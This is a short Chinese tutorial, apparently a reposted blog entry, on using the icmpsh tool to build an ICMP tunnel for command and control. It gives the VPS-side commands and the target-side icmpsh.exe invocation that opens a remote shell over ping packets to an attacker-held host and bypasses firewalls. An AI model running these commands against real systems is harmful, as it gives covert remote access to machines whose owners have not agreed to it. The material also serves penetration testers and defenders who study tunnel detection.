内网转发及隐蔽隧道 | 使用ICMP进行命令控制(Icmpsh)

使用ICMP进行命令控制(Icmpsh)
目录

ICMP隧道

使用ICMP进行命令控制(Icmpsh)

ICMP隧道

ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。

在一些网络环境中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙一般不会屏蔽ping的数据包),实现不受限制的访问访问。

使用ICMP进行命令控制(Icmpsh)

适用场景:目标机器是Windows服务器的情况

git clone https://github.com/inquisb/icmpsh.git #先下载icmpsh工具

VPS的操作

sysctl -w net.ipv4.icmp_echo_ignore_all=1       #关闭icmp回复,如果要开启icmp回复,该值设置为0python2 icmpsh_m.py 172.31.226.161 x.x.x.x      #运行,第一个IP是VPS的eth0网卡IP,第二个IP是目标机器出口的公网IP

目标机器的操作:

icmpsh.exe -t x.x.x.x -d 500 -b 30 -s 128

抓包,可以看到两者之间通信都是icmp的数据包

责编:vivian

来源:谢公子博客

(0)

相关推荐

  • 网络管理常用命令之一 Ping 命令详解(图文)

    Ping命令... TTL:生存时间... 不带选项... -t 选项... -a 选项... -n 选项... -l 选项(Length)... -f 选项... Request timed out ...

  • ICMP隧道通信原理与通信特征

    一. ICMP 隧道技术解析 1.1 ICMP协议 ICMP(Internet Control Message Protocol)Internet控制报文协议.它是TCP/IP协议簇的一个子协议,用于 ...

  • 内网渗透之DNS隧道技术

    声明:请勿利用文中相关技术非法测试,如因此产生的一切不良后果与文章作者及本公众号无关! 01 前言 在渗透目标中过程中,可能碰有些网络的防火墙设置只允许端口53的UDP流量,就不能通过tcp搭建隧道, ...

  • UC头条:linux之ssh隧道大法好(端口转发 内网映射)

    ?ssh隧道是什么鬼? 搞过的大佬说:就是一条命令 需求: 有一台内网主机(linux),和一台云主机(linux),要实现:在任意主机均可访问内网主机 一起看下图(不喜勿喷) 点击加载图片 注意:内 ...

  • Linux 通过端口转发来访问内网服务

    Linux 通过端口转发来访问内网服务

  • SSH 内网端口转发实战

    如果两个内网之间的linux服务器需要互相登录,或需要互相访问内网某个端口,担忧没有公网IP,可以使用的方法有ngrok(https://ngrok.com/),但并不方便,我们只需两条 SSH 命令 ...

  • 无需安装,仅需 1 条指令,秒实现内网穿透的神器 Serveo

    leafcho阅52转02020-05-19分享收藏概述 Serveo工作原理当用户通过 SSH 连接到 Serveo 时会与该网站建立一个远程代理,Serveo 随后会生成一个 公共 URL,任何人 ...

  • Metasploit-framework 内网穿透:多场景详解

    李逍遥g FreeBuf 今天 前言 对于一名合格的网络安全从业者来说,Metasploit-framework是必会不可的工具,大大降低了exploit的利用门槛. 但在实战中,复杂的网络环境以及防 ...

  • 巢内网

    胃里长息肉有癌变可能,但是癌变概率比较低.多数的胃息肉是炎性的息肉,属于良性的改变,如果比较小,患者也没有特殊不适的症状,一般不会发生癌变.但如果息肉比较大,产生了恶心.呕吐.腹痛.腹泻等症状,或患者 ...

  • 这是最近内网最火的一篇文章——阿里职场的“潜”规则

    前言: 写这篇文的原题是<阿里职场潜规则>希望小白们尽快学会规则,利用规则,不对味儿就早点出火坑,对味儿了就往死里干,人这辈子青春与汗水是有限的,如果换不回理想那换些臭钱也行. 正确分析事 ...

  • 内网基础知识及域环境搭建

    前言 民国三年等不到一场雨,此生等不到表哥一句我带你. 目录 * 1.工作组 * 2.域 * 3.活动目录 * 4.安全域的划分 * 5.域中计算机的分类 * 6.域内权限 * 7.A-G-DL-P策 ...